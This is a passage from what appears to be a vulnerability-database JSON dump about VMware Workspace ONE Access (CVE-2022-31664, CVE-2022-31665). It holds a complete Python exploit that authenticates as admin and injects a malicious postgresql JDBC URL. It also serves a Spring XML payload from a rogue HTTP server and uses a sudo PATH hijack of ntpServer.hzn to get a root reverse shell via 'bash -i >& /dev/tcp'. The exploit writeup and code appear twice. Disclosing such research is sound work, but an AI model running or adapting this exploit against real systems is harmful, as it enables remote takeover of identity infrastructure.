see:\r\n\r\n```\r\n...\r\nhorizon ALL = NOPASSWD: /usr/local/horizon/scripts/horizonService.sh, \\\r\n...\r\n/usr/local/horizon/scripts/ntpServer.hzn, \\\r\n...\r\n```\r\n\r\nThis means we can execute the /usr/local/horizon/scripts/ntpServer.hzn script as root. Studying this file we find:\r\n\r\n```\r\n...\r\nfunction check_ntp_server() {\r\n # check connectivity to the given ntp server\r\n NTP_SERVER=$1\r\n for i in $(echo $NTP_SERVER | tr \",\" \"\\n\")\r\n do\r\n echo \"####### Checking for NTP server : $i ########\"\r\n sntp $i // 2\r\n echo \"##############################################################\"\r\n echo \" \"\r\n done\r\n}\r\n...\r\ncase \"$1\" in\r\n --get)\r\n get_ntp_server\r\n ;;\r\n --check)\r\n if [ -z \"$2\" ]\r\n then\r\n usage\r\n fi\r\n check_ntp_server $2 // 1\r\n```\r\n\r\nThis code will call `check_ntp_server` at [1]. Then at [2] the code executes the file `sntp`. The problem here is that the file doesn't exist:\r\n\r\n```\r\nroot@vidm [ /home/sshuser ]# find / -type f -name \"sntp\"\r\nroot@vidm [ /home/sshuser ]#\r\n```\r\n\r\nSo an attacker can modify the path and add a writeable directory to it and then create the sntp file:\r\n\r\n```\r\nhorizon@vidm [ /tmp ]$ cat lpe\r\n#!/bin/bash\r\nFILENAME=sntp\r\nrm -rf $FILENAME\r\ncd /tmp\r\necho '#!/bin/bash' > $FILENAME\r\necho 'bash' >> $FILENAME\r\nchmod 777 $FILENAME\r\nPATH=\".:$PATH\" sudo /usr/local/horizon/scripts/ntpServer.hzn --check lol\r\nhorizon@vidm [ /tmp ]$ ./lpe\r\n####### Checking for NTP server : lol ########\r\nroot [ /tmp ]# id\r\nuid=0(root) gid=0(root) groups=0(root),1000(vami),1004(sshaccess)\r\nroot [ /tmp ]#\r\n```\r\n\r\n# Exploitation:\r\n\r\nTo bypass the patch, all I did was use the postgres driver for an attack, instead of MySQL. So it wasn't enough to remove the MySQL Driver and/or gadget chain within the code base.\r\n\r\n# Example:\r\n\r\n```\r\nresearcher@mars:~/research/vidm/patch-bypass$ ./poc.py \r\n(+) usage: ./poc.py(+) eg: ./poc.py 192.168.2.97 192.168.2.234 admin:Admin22#\r\n\r\nresearcher@mars:~/research/vidm/patch-bypass$ ./poc.py 192.168.2.97 192.168.2.234 admin:Admin22#\r\n(+) attacking target via the postgresql driver\r\n(+) rogue http server listening on 0.0.0.0:9090\r\n(+) starting handler on port 1234\r\n(+) logged in as admin\r\n(+) triggering jdbc attack...\r\n(+) connection from 192.168.2.97\r\n(+) pop thy shell!\r\nbash: cannot set terminal process group (1686): Inappropriate ioctl for device\r\nbash: no job control in this shell\r\nroot [ /tmp ]# id\r\nid\r\nuid=0(root) gid=0(root) groups=0(root),1000(vami),1004(sshaccess)\r\nroot [ /tmp ]# uname -a\r\nuname -a\r\nLinux vidm.localdomain 4.19.217-1.ph3 #1-photon SMP Thu Dec 2 02:29:27 UTC 2021 x86_64 GNU/Linux\r\nroot [ /tmp ]#\r\n```\r\n\"\"\"\r\nimport re\r\nimport sys\r\nimport socket\r\nimport requests\r\nfrom base64 import b64encode\r\nfrom telnetlib import Telnet\r\nfrom threading import Thread\r\nfrom colorama import Fore, Style, Back\r\nfrom random import getrandbits, choice\r\nfrom urllib3 import disable_warnings, exceptions\r\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\r\ndisable_warnings(exceptions.InsecureRequestWarning)\r\n\r\nbeans = \"\"\"/bin/bash-c<![CDATA[echo {lpe}|base64 -d|bash]]>\"\"\"\r\n\r\nlpe_payload = \"\"\"#!/bin/bash\r\nFILENAME=sntp\r\nrm -rf $FILENAME\r\ncd /tmp\r\necho '#!/bin/bash' > $FILENAME\r\necho 'bash -i >& /dev/tcp/{rhost}/{rport} 0>&1' >> $FILENAME\r\nchmod 777 $FILENAME\r\nPATH=\".:$PATH\" sudo /usr/local/horizon/scripts/ntpServer.hzn --check lol\"\"\"\r\n\r\nclass http_server(BaseHTTPRequestHandler): \r\n def log_message(self, format, *args):\r\n return\r\n def _set_response(self, d):\r\n self.send_response(200)\r\n self.send_header('Content-type', 'text/xml')\r\n self.send_header('Content-Length', len(d))\r\n self.end_headers()\r\n def do_GET(self):\r\n if self.path.endswith(\"poc.xml\"):\r\n lpe = lpe_payload.format(rhost=rhost, rport=rport)\r\n message = beans.format(lpe=b64encode(str.encode(lpe)).decode())\r\n self._set_response(message)\r\n self.wfile.write(message.encode('utf-8'))\r\n self.wfile.write('\\n'.encode('utf-8'))\r\n\r\ndef login(t, u , p):\r\n d = {\r\n \"username\": u,\r\n \"password\": p\r\n }\r\n r = requests.post(\"https://%s:8443/cfg/j_security_check\" % t, data=d, verify=False, allow_redirects=False)\r\n assert r.headers['location'] != \"/cfg/login?failure=true\", \"(-) authentication failed, check your credentials\"\r\n assert \"JSESSIONID\" in r.headers['set-cookie'], \"(-) no jsessionid recieved, check your credentials\"\r\n m = re.search(\"JSESSIONID=(.{32});\",r.headers['set-cookie'])\r\n return m.group(1)\r\n\r\ndef get_tk(t, c):\r\n r = requests.get(\"https://%s:8443/cfg/setup\" % t, cookies=c, verify=False)\r\n m = re.search(\"window.ec_wiz.vk = '(.*)';\", r.text)\r\n assert m, \"(-) cannot find csrf token!\"\r\n return m.group(1)\r\n\r\ndef trigger_jdbc(t, c, tk, uri):\r\n h = {\"X-Vk\" : tk}\r\n d = {\r\n \"jdbcurl\" : uri,\r\n \"dbUsername\": \"junk\",\r\n \"dbPassword\" : \"junk\",\r\n \"encryptConnection\": False # needed for \r\n }\r\n requests.post(\"https://%s:8443/cfg/setup/test\" % t, headers=h, data=d, cookies=c, verify=False)\r\n \r\ndef handler(lp):\r\n print(f\"(+) starting handler on port {lp}\")\r\n t = Telnet()\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.bind((\"0.0.0.0\", lp))\r\n s.listen(1)\r\n conn, addr = s.accept()\r\n print(f\"(+) connection from {addr[0]}\")\r\n t.sock = conn\r\n print(f\"(+) {Fore.BLUE + Style.BRIGHT}pop thy shell!{Style.RESET_ALL}\")\r\n t.interact()\r\n\r\ndef main():\r\n global rhost, rport\r\n if len(sys.argv) != 4:\r\n print(\"(+) usage: %s\" % sys.argv[0])\r\n print(\"(+) eg: %s 192.168.2.97 192.168.2.234 admin:Admin22#\" % sys.argv[0])\r\n sys.exit(1)\r\n assert \":\" in sys.argv[3], \"(-) credentials need to be in user:pass format\"\r\n target = sys.argv[1]\r\n rhost = sys.argv[2]\r\n rport = 1234\r\n http_port = 9090\r\n if \":\" in sys.argv[2]:\r\n rhost = sys.argv[2].split(\":\")[0]\r\n assert sys.argv[2].split(\":\")[1].isnumeric(), \"(-) connectback port must be a number!\"\r\n rport = int(sys.argv[2].split(\":\")[1])\r\n usr = sys.argv[3].split(\":\")[0]\r\n pwd = sys.argv[3].split(\":\")[1]\r\n # patch bypass for CVE-2022-22958\r\n jdbc = f\"jdbc:postgresql://blah:1337/saas?socketFactory=org.springframework.context.support.FileSystemXmlApplicationContext&socketFactoryArg=http://{rhost}:9090/poc.xml\"\r\n cookie = { \"JSESSIONID\": login(target, usr, pwd) }\r\n tk = get_tk(target, cookie)\r\n server = HTTPServer(('0.0.0.0', http_port), http_server)\r\n handlerthr = Thread(target=server.serve_forever, args=[])\r\n handlerthr.daemon = True\r\n handlerthr.start()\r\n print(f\"(+) attacking target via the postgresql driver\")\r\n print(f\"(+) rogue http server listening on 0.0.0.0:{http_port}\")\r\n handlerthr = Thread(target=handler, args=[rport])\r\n handlerthr.start()\r\n print(\"(+) logged in as %s\" % usr)\r\n print(\"(+) triggering jdbc attack...\")\r\n trigger_jdbc(target, cookie, tk, jdbc)\r\n\r\nif __name__ == \"__main__\":\r\n main()", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://srcincite.io/pocs/cve-2022-{31664,31665}.py.txt"}, {"lastseen": "2022-08-11T21:13:10", "description": "**Vulnerability Details:**\n\nThis vulnerability allows local attackers to escalate privileges on affected installations of VMware Workspace ONE Access. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThe specific flaw exists within ntpServer.hzn script. The issue results from allowing attackers to execute non existant scripts. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of root.\n\n**Affected Vendors:**\n\nVMWare\n\n**Affected Products:**\n\nWorkspace ONE Access, Identity Manager, vRealize Automation\n\n**Vendor Response:**\n\nVMWare has issued an update to correct this vulnerability. More details can be found at: <https://www.vmware.com/security/advisories/VMSA-2022-0011.html>\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-12T00:00:00", "type": "srcincite", "title": "SRC-2022-0016 : VMware Workspace ONE Access ntpServer.hzn Privilege Escalation Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-4006", "CVE-2022-22958", "CVE-2022-31664", "CVE-2022-31665"], "modified": "2022-08-02T00:00:00", "id": "SRC-2022-0016", "href": "https://srcincite.io/advisories/src-2022-0016/", "sourceData": "#!/usr/bin/env python3\r\n\"\"\"\r\nVMware Workspace ONE Access ApplicationSetupController dbTestConnection JDBC Injection Remote Code Execution Exploit\r\nSteven Seeley of Qihoo 360 Vulnerability Research Institute\r\n\r\n# Summary:\r\n\r\nThis vulnerability allows a remote attacker authenticated as admin to execute remote code as horizon. The attacker can chain this with another vulnerability to achieve code execution as root.\r\n\r\n# Notes:\r\n\r\nThis is a patch bypass for CVE-2022-22958 chained with a new LPE exploit. VMware has patched the bugs in this report and released an advisory here: https://www.vmware.com/security/advisories/VMSA-2022-0021.html.\r\n\r\n# Vulnerability Analysis:\r\n\r\n## ApplicationSetupController dbTestConnection JDBC Injection (CVE-2022-31665)\r\n\r\nInside of the com.vmware.horizon.svadmin.controller.ApplicationSetupController we can see the following code:\r\n\r\n```java\r\n/* */ public AjaxResponse dbTestConnection(@RequestParam(\"jdbcurl\") String jdbcUrl, @RequestParam(\"dbUsername\") String dbUsername, @RequestParam(\"dbPassword\") String dbPassword) { try {\r\n/* 65 */ validateDbFields(jdbcUrl, dbUsername, dbPassword);\r\n/* 66 */ } catch (AdminPortalException e) {\r\n/* 67 */ return new AjaxResponse(Messages.getMessage(e.getErrorId(), e.getArgs()), Integer.valueOf(1), false);\r\n/* */ } \r\n/* */ \r\n/* */ try {\r\n/* 71 */ log.info(\"Testing database connection... jdbcUrl {}, dbUsername {}, passwordSet? {}\", new Object[] { jdbcUrl, dbUsername, \r\n/* 72 */ Boolean.valueOf(StringUtils.isNotBlank(dbPassword)) });\r\n/* 73 */ dbPassword = getDatabasePassword(dbPassword);\r\n/* 74 */ this.applicationSetupService.testDatabaseConnection(jdbcUrl, dbUsername, dbPassword); // 1 \r\n/* 75 */ } catch (AdminPortalException e) {\r\n/* 76 */ String error = null;\r\n/* 77 */ if (StringUtils.isNotBlank(e.getMessage())) {\r\n/* 78 */ error = this.applianceDiagnosticService.getLocalizedDBErrorMessages(e.getMessage());\r\n/* */ }\r\n/* */ \r\n/* 81 */ return new AjaxResponse(Messages.getMessage(\"configurator.configure.db.testFailed\", new Object[] { error\r\n/* 82 */ }), Integer.valueOf(2), false);\r\n/* */ } \r\n/* 84 */ return new AjaxResponse(Messages.getMessage(\"configurator.configure.db.testSuccess\"), Integer.valueOf(0), true); }\r\n```\r\n\r\nAt [1] the code calls `ApplicationSetupService.testDatabaseConnection`\r\n\r\n```java\r\n/* */ public void testDatabaseConnection(@NotNull String jdbcUrl, @NotNull String dbUsername, @NotNull String dbPassword, boolean checkCreateTableAccess) throws AdminPortalException {\r\n/* */ String[] cmd;\r\n/* 210 */ log.debug(\"Testing db connection params jdbcUrl: {}\", jdbcUrl);\r\n/* */ \r\n/* 212 */ String encryptedPwd = this.configEncrypter.encrypt(dbPassword);\r\n/* */ \r\n/* */ \r\n/* 215 */ dbUsername = AppliancePasswordService.escapeArg(dbUsername);\r\n/* 216 */ jdbcUrl = AppliancePasswordService.escapeArg(jdbcUrl);\r\n/* */ \r\n/* 218 */ if (Const.isWindowsDeployment) {\r\n/* 219 */ cmd = new String[] { COMMAND_SHELL, COMMAND_SHELL_ARG, \"\\\"\\\"\" + TEST_DB_CONNECTION_CMD + \"\\\"\" + \" \" + jdbcUrl + \" \" + dbUsername + \" \\\"\" + encryptedPwd + \"\\\" \" + checkCreateTableAccess + \"\\\"\" };\r\n/* */ } else {\r\n/* 221 */ cmd = new String[] { COMMAND_SHELL, COMMAND_SHELL_ARG, TEST_DB_CONNECTION_CMD + \" \" + jdbcUrl + \" \" + dbUsername + \" '\" + encryptedPwd + \"' \" + checkCreateTableAccess };\r\n/* */ } \r\n/* */ \r\n/* */ try {\r\n/* 225 */ CommandUtils.executeCommand(cmd); // 2\r\n/* 226 */ } catch (CommandException e) {\r\n/* 227 */ log.error(String.format(\"Error testing DB Connection with jdbc url: %s, user: %s.\", new Object[] { jdbcUrl, dbUsername }));\r\n/* 228 */ throw new AdminPortalException(StringUtils.removeStart(e.getStdOut(), \"ERROR:\").trim(), e);\r\n/* 229 */ } catch (IOException e) {\r\n/* 230 */ log.error(String.format(\"Error testing DB Connection with jdbc url: %s, user: %s.\", new Object[] { jdbcUrl, dbUsername }));\r\n/* 231 */ throw new AdminPortalException(e.getMessage(), e);\r\n/* */ } \r\n/* */ }\r\n```\r\n\r\nAt [2] the code executes the `/usr/local/horizon/bin/dbConnCheck` script which runs the following command. The `AppliancePasswordService.escapeArg` method is safe from injection attacks here (patch for CVE-2020-4006). Inside the script, we see the code drops privileges and calls `com.vmware.horizon.dbConnectionCheck.Main`:\r\n\r\n```sh\r\nif [[ $EUID -eq 0 ]]; then\r\n params=()\r\n for v in \"$@\" ; do\r\n params+=( $(escape \"$v\") )\r\n done\r\n su ${TOMCAT_USER} -c \"$JAVACMD $HZN_TOOL_OPTS -cp ${BC_JAR}:${ADMIN_JAR} com.vmware.horizon.dbConnectionCheck.Main ${params[*]}\" 2>/dev/null\r\nelse\r\n $JAVACMD $HZN_TOOL_OPTS -cp ${BC_JAR}:${ADMIN_JAR} com.vmware.horizon.dbConnectionCheck.Main $@ 2>/dev/null\r\nfi\r\n```\r\n\r\nThe resultant command is:\r\n\r\n```\r\nsu horizon -c /usr/java/jre-vmware/bin/java -Dlog4j.configurationFile=file:/usr/local/horizon/conf/saas-log4j.properties -Dcatalina.base=/opt/vmware/horizon/workspace -Didm.fips.mode.required=true -Djava.security.properties=/opt/vmware/horizon/workspace/conf/idm_fips.security -Dorg.bouncycastle.fips.approved_only=true -cp /usr/local/horizon/jre-endorsed/bc-fips-1.0.1.BC-FIPS-Certified.jar:/usr/local/horizon/jars/dbConnection-0.1-jar-with-dependencies.jar com.vmware.horizon.dbConnectionCheck.Maintrue 2>/dev/null\r\n```\r\n\r\nwhereis controlled by the attacker. This can lead to an attacker crafting a jdbc uri using specifying a mysql driver and trigger deserialization of untrusted data. The `CommonsBeanutils1` gadget from ysoserial will work to enable an attacker to gain remote code execution.\r\n\r\nBelow is the stack trace starting from the `com.vmware.horizon.dbConnectionCheck.Main` class that is executing a command (see poc.png):\r\n\r\n```\r\nProcessBuilder.start() line: 1007 [local variables unavailable]\t\r\nNativeMethodAccessorImpl.invoke0(Method, Object, Object[]) line: not available [native method]\t\r\nNativeMethodAccessorImpl.invoke(Object, Object[]) line: 62\t\r\nDelegatingMethodAccessorImpl.invoke(Object, Object[]) line: 43\t\r\nMethod.invoke(Object, Object...) line: 498\t\r\nReflectiveMethodExecutor.execute(EvaluationContext, Object, Object...) line: 129\t\r\nMethodReference.getValueInternal(EvaluationContext, Object, TypeDescriptor, Object[]) line: 139\t\r\nMethodReference.access$000(MethodReference, EvaluationContext, Object, TypeDescriptor, Object[]) line: 55\t\r\nMethodReference$MethodValueRef.getValue() line: 387\t\r\nCompoundExpression.getValueInternal(ExpressionState) line: 92\t\r\nCompoundExpression(SpelNodeImpl).getValue(ExpressionState) line: 112\t\r\nSpelExpression.getValue(EvaluationContext) line: 272\t\r\nStandardBeanExpressionResolver.evaluate(String, BeanExpressionContext) line: 166\t\r\nDefaultListableBeanFactory(AbstractBeanFactory).evaluateBeanDefinitionString(String, BeanDefinition) line: 1575\t\r\nBeanDefinitionValueResolver.doEvaluate(String) line: 280\t\r\nBeanDefinitionValueResolver.evaluate(TypedStringValue) line: 237\t\r\nBeanDefinitionValueResolver.resolveValueIfNecessary(Object, Object) line: 205\t\r\nDefaultListableBeanFactory(AbstractAutowireCapableBeanFactory).applyPropertyValues(String, BeanDefinition, BeanWrapper, PropertyValues) line: 1702\t\r\nDefaultListableBeanFactory(AbstractAutowireCapableBeanFactory).populateBean(String, RootBeanDefinition, BeanWrapper) line: 1447\t\r\nDefaultListableBeanFactory(AbstractAutowireCapableBeanFactory).doCreateBean(String, RootBeanDefinition, Object[]) line: 593\t\r\nDefaultListableBeanFactory(AbstractAutowireCapableBeanFactory).createBean(String, RootBeanDefinition, Object[]) line: 516\t\r\nDefaultListableBeanFactory(AbstractBeanFactory).lambda$doGetBean$0(String, RootBeanDefinition, Object[]) line: 324\t\r\n761923430.getObject() line: not available\t\r\nDefaultListableBeanFactory(DefaultSingletonBeanRegistry).getSingleton(String, ObjectFactory>) line: 234\t\r\nDefaultListableBeanFactory(AbstractBeanFactory).doGetBean(String, Class, Object[], boolean) line: 322\t\r\nDefaultListableBeanFactory(AbstractBeanFactory).getBean(String) line: 202\t\r\nDefaultListableBeanFactory.preInstantiateSingletons() line: 897\t\r\nFileSystemXmlApplicationContext(AbstractApplicationContext).finishBeanFactoryInitialization(ConfigurableListableBeanFactory) line: 879\t\r\nFileSystemXmlApplicationContext(AbstractApplicationContext).refresh() line: 551\t\r\nFileSystemXmlApplicationContext.(String[], boolean, ApplicationContext) line: 142\t\r\nFileSystemXmlApplicationContext.(String) line: 85\t\r\nNativeConstructorAccessorImpl.newInstance0(Constructor>, Object[]) line: not available [native method]\t\r\nNativeConstructorAccessorImpl.newInstance(Object[]) line: 62\t\r\nDelegatingConstructorAccessorImpl.newInstance(Object[]) line: 45\t\r\nConstructor.newInstance(Object...) line: 423\t\r\nObjectFactory.instantiate(String, Properties, boolean, String) line: 62\t\r\nSocketFactoryFactory.getSocketFactory(Properties) line: 39\t\r\nConnectionFactoryImpl.openConnectionImpl(HostSpec[], String, String, Properties) line: 182\t\r\nConnectionFactory.openConnection(HostSpec[], String, String, Properties) line: 51\t\r\nPgConnection.(HostSpec[], String, String, Properties, String) line: 223\t\r\nDriver.makeConnection(String, Properties) line: 465\t\r\nDriver.connect(String, Properties) line: 264\t\r\nDriverManager.getConnection(String, Properties, Class>) line: 664\t\r\nDriverManager.getConnection(String, String, String) line: 247\t\r\nDbConnectionCheckServiceImpl$FactoryHelper.getConnection(String, String, String) line: 444\t\r\nDbConnectionCheckServiceImpl.testConnection(String, String, String, boolean) line: 141\t\r\nDbConnectionCheckServiceImpl.checkConnection(String, String, String, boolean) line: 95\t\r\nMain.main(String[]) line: 61\t\r\n```\r\n\r\n## ntpServer.hzn Privilege Escalation Vulnerability (CVE-2022-31664)\r\n\r\nInside of the /etc/sudoers file we see:\r\n\r\n```\r\n...\r\nhorizon ALL = NOPASSWD: /usr/local/horizon/scripts/horizonService.sh, \\\r\n...\r\n/usr/local/horizon/scripts/ntpServer.hzn, \\\r\n...\r\n```\r\n\r\nThis means we can execute the /usr/local/horizon/scripts/ntpServer.hzn script as root. Studying this file we find:\r\n\r\n```\r\n...\r\nfunction check_ntp_server() {\r\n # check connectivity to the given ntp server\r\n NTP_SERVER=$1\r\n for i in $(echo $NTP_SERVER | tr \",\" \"\\n\")\r\n do\r\n echo \"####### Checking for NTP server : $i ########\"\r\n sntp $i // 2\r\n echo \"##############################################################\"\r\n echo \" \"\r\n done\r\n}\r\n...\r\ncase \"$1\" in\r\n --get)\r\n get_ntp_server\r\n ;;\r\n --check)\r\n if [ -z \"$2\" ]\r\n then\r\n usage\r\n fi\r\n check_ntp_server $2 // 1\r\n```\r\n\r\nThis code will call `check_ntp_server` at [1]. Then at [2] the code executes the file `sntp`. The problem here is that the file doesn't exist:\r\n\r\n```\r\nroot@vidm [ /home/sshuser ]# find / -type f -name \"sntp\"\r\nroot@vidm [ /home/sshuser ]#\r\n```\r\n\r\nSo an attacker can modify the path and add a writeable directory to it and then create the sntp file:\r\n\r\n```\r\nhorizon@vidm [ /tmp ]$ cat lpe\r\n#!/bin/bash\r\nFILENAME=sntp\r\nrm -rf $FILENAME\r\ncd /tmp\r\necho '#!/bin/bash' > $FILENAME\r\necho 'bash' >> $FILENAME\r\nchmod 777 $FILENAME\r\nPATH=\".:$PATH\" sudo /usr/local/horizon/scripts/ntpServer.hzn --check lol\r\nhorizon@vidm [ /tmp ]$ ./lpe\r\n####### Checking for NTP server : lol ########\r\nroot [ /tmp ]# id\r\nuid=0(root) gid=0(root) groups=0(root),1000(vami),1004(sshaccess)\r\nroot [ /tmp ]#\r\n```\r\n\r\n# Exploitation:\r\n\r\nTo bypass the patch, all I did was use the postgres driver for an attack, instead of MySQL. So it wasn't enough to remove the MySQL Driver and/or gadget chain within the code base.\r\n\r\n# Example:\r\n\r\n```\r\nresearcher@mars:~/research/vidm/patch-bypass$ ./poc.py \r\n(+) usage: ./poc.py(+) eg: ./poc.py 192.168.2.97 192.168.2.234 admin:Admin22#\r\n\r\nresearcher@mars:~/research/vidm/patch-bypass$ ./poc.py 192.168.2.97 192.168.2.234 admin:Admin22#\r\n(+) attacking target via the postgresql driver\r\n(+) rogue http server listening on 0.0.0.0:9090\r\n(+) starting handler on port 1234\r\n(+) logged in as admin\r\n(+) triggering jdbc attack...\r\n(+) connection from 192.168.2.97\r\n(+) pop thy shell!\r\nbash: cannot set terminal process group (1686): Inappropriate ioctl for device\r\nbash: no job control in this shell\r\nroot [ /tmp ]# id\r\nid\r\nuid=0(root) gid=0(root) groups=0(root),1000(vami),1004(sshaccess)\r\nroot [ /tmp ]# uname -a\r\nuname -a\r\nLinux vidm.localdomain 4.19.217-1.ph3 #1-photon SMP Thu Dec 2 02:29:27 UTC 2021 x86_64 GNU/Linux\r\nroot [ /tmp ]#\r\n```\r\n\"\"\"\r\nimport re\r\nimport sys\r\nimport socket\r\nimport requests\r\nfrom base64 import b64encode\r\nfrom telnetlib import Telnet\r\nfrom threading import Thread\r\nfrom colorama import Fore, Style, Back\r\nfrom random import getrandbits, choice\r\nfrom urllib3 import disable_warnings, exceptions\r\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\r\ndisable_warnings(exceptions.InsecureRequestWarning)\r\n\r\nbeans = \"\"\"/bin/bash-c<![CDATA[echo {lpe}|base64 -d|bash]]>\"\"\"\r\n\r\nlpe_payload = \"\"\"#!/bin/bash\r\nFILENAME=sntp\r\nrm -rf $FILENAME\r\ncd /tmp\r\necho '#!/bin/bash' > $FILENAME\r\necho 'bash -i >& /dev/tcp/{rhost}/{rport} 0>&1' >> $FILENAME\r\nchmod 777 $FILENAME\r\nPATH=\".:$PATH\" sudo /usr/local/horizon/scripts/ntpServer.hzn --check lol\"\"\"\r\n\r\nclass http_server(BaseHTTPRequestHandler): \r\n def log_message(self, format, *args):\r\n return\r\n def _set_response(self, d):\r\n self.send_response(200)\r\n self.send_header('Content-type', 'text/xml')\r\n self.send_header('Content-Length', len(d))\r\n self.end_headers()\r\n def do_GET(self):\r\n if self.path.endswith(\"poc.xml\"):\r\n lpe = lpe_payload.format(rhost=rhost, rport=rport)\r\n message = beans.format(lpe=b64encode(str.encode(lpe)).decode())\r\n self._set_response(message)\r\n self.wfile.write(message.encode('utf-8'))\r\n self.wfile.write('\\n'.encode('utf-8'))\r\n\r\ndef login(t, u , p):\r\n d = {\r\n \"username\": u,\r\n \"password\": p\r\n }\r\n r = requests.post(\"https://%s:8443/cfg/j_security_check\" % t, data=d, verify=False, allow_redirects=False)\r\n assert r.headers['location'] != \"/cfg/login?failure=true\", \"(-) authentication failed, check your credentials\"\r\n assert \"JSESSIONID\" in r.headers['set-cookie'], \"(-) no jsessionid recieved, check your credentials\"\r\n m = re.search(\"JSESSIONID=(.{32});\",r.headers['set-cookie'])\r\n return m.group(1)\r\n\r\ndef get_tk(t, c):\r\n r = requests.get(\"https://%s:8443/cfg/setup\" % t, cookies=c, verify=False)\r\n m = re.search(\"window.ec_wiz.vk = '(.*)';\", r.text)\r\n assert m, \"(-) cannot find csrf token!\"\r\n return m.group(1)\r\n\r\ndef trigger_jdbc(t, c, tk, uri):\r\n h = {\"X-Vk\" : tk}\r\n d = {\r\n \"jdbcurl\" : uri,\r\n \"dbUsername\": \"junk\",\r\n \"dbPassword\" : \"junk\",\r\n \"encryptConnection\": False # needed for \r\n }\r\n requests.post(\"https://%s:8443/cfg/setup/test\" % t, headers=h, data=d, cookies=c, verify=False)\r\n \r\ndef handler(lp):\r\n print(f\"(+) starting handler on port {lp}\")\r\n t = Telnet()\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.bind((\"0.0.0.0\", lp))\r\n s.listen(1)\r\n conn, addr = s.accept()\r\n print(f\"(+) connection from {addr[0]}\")\r\n t.sock = conn\r\n print(f\"(+) {Fore.BLUE + Style.BRIGHT}pop thy shell!{Style.RESET_ALL}\")\r\n t.interact()\r\n\r\ndef main():\r\n global rhost, rport\r\n if len(sys.argv) != 4:\r\n print(\"(+) usage: %s\" % sys.argv[0])\r\n print(\"(+) eg: %s 192.168.2.97 192.168.2.234 admin:Admin22#\" % sys.argv[0])\r\n sys.exit(1)\r\n assert \":\" in sys.argv[3], \"(-) credentials need to be in user:pass format\"\r\n target = sys.argv[1]\r\n rhost = sys.argv[2]\r\n rport = 1234\r\n http_port = 9090\r\n if \":\" in sys.argv[2]:\r\n rhost = sys.argv[2].split(\":\")[0]\r\n assert sys.argv[2].split(\":\")[1].isnumeric(), \"(-) connectback port must be a number!\"\r\n rport = int(sys.argv[2].split(\":\")[1])\r\n usr = sys.argv[3].split(\":\")[0]\r\n pwd = sys.argv[3].split(\":\")[1]\r\n # patch bypass for CVE-2022-22958\r\n jdbc = f\"jdbc:postgresql://blah:1337/saas?socketFactory=org.springframework.context.support.FileSystemXmlApplicationContext&socketFactoryArg=http://{rhost}:9090/poc.xml\"\r\n cookie = { \"JSESSIONID\": login(target, usr, pwd) }\r\n tk = get_tk(target, cookie)\r\n server = HTTPServer(('0.0.0.0', http_port), http_server)\r\n handlerthr = Thread(target=server.serve_forever, args=[])\r\n handlerthr.daemon = True\r\n handlerthr.start()\r\n print(f\"(+) attacking target via the postgresql driver\")\r\n print(f\"(+) rogue http server listening on 0.0.0.0:{http_port}\")\r\n handlerthr = Thread(target=handler, args=[rport])\r\n handlerthr.start()\r\n print(\"(+) logged in as %s\" % usr)\r\n print(\"(+) triggering jdbc attack...\")\r\n trigger_jdbc(target, cookie, tk, jdbc)\r\n\r\nif __name__ == \"__main__\":\r\n main()", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://srcincite.io/pocs/cve-2022-{31664,31665}.py.txt"}]}
VMware products impacted by an authentication bypass vulnerability and other flaws
